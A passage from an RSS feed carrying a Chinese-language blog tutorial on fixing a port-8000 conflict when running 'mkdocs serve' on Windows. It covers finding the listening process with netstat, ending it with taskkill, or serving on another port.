serve&lt;/code&gt;命令后，如果本地已经启动相同端口（默认8000）的服务，则会报错错误，例如：&lt;/p&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_16&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;[WinError&amp;nbsp;10013]&amp;nbsp;以一种访问权限不允许的方式做了一个访问套接字的尝试。&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;解决办法：在&lt;code&gt;cmd&lt;/code&gt;控制台中，输入如下命令：&lt;/p&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_17&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;#查看端口
netstat&amp;nbsp;-ano|findstr&amp;nbsp;8000&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;执行后会得到如下输出：&lt;/p&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_18&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;(py39)&amp;nbsp;D:\project&amp;gt;netstat&amp;nbsp;-ano|findstr&amp;nbsp;8000
&amp;nbsp;&amp;nbsp;TCP&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0.0.0.0:8000&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0.0.0.0:0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;LISTENING&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2868
&amp;nbsp;&amp;nbsp;UDP&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0.0.0.0:8000&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;*:*&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;2868&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;在结果中，LISTENING下面的数字就是监听8000端口的进程。使用&lt;code&gt;taskkill /pid 进程号 /F&lt;/code&gt;将其关闭即可。&lt;/p&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre id=&quot;__code_19&quot; class=&quot;brush:python;toolbar:false;&quot;&gt;(py39)&amp;nbsp;D:\project&amp;gt;taskkill&amp;nbsp;/pid&amp;nbsp;2868&amp;nbsp;/F
成功:&amp;nbsp;已终止&amp;nbsp;PID&amp;nbsp;为&amp;nbsp;2868&amp;nbsp;的进程。&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;再次运行&lt;code&gt;mkdocs serve&lt;/code&gt;即可。&lt;/p&gt;&lt;details class=&quot;note&quot;&gt;&lt;summary class=&quot;focus-visible&quot; data-focus-visible-added=&quot;&quot;&gt;有时发现关闭进程后，系统又启动了一个监听相同端口的进程，这表明有某个软件在以服务的形式启动，并一直占用着该端口。可以换个端口启动，例如：&lt;code&gt;mkdocs serve -a 127.0.0.1:8001&lt;/code&gt;，将端口改成8001进行启动&lt;/summary&gt;&lt;/details&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;</description><pubDate>Wed, 27 Sep 2023 10:15:43 +0800</pubDate></item></channel></rss><!--41.23ms , 5 query , 871kb memory , 0 error-->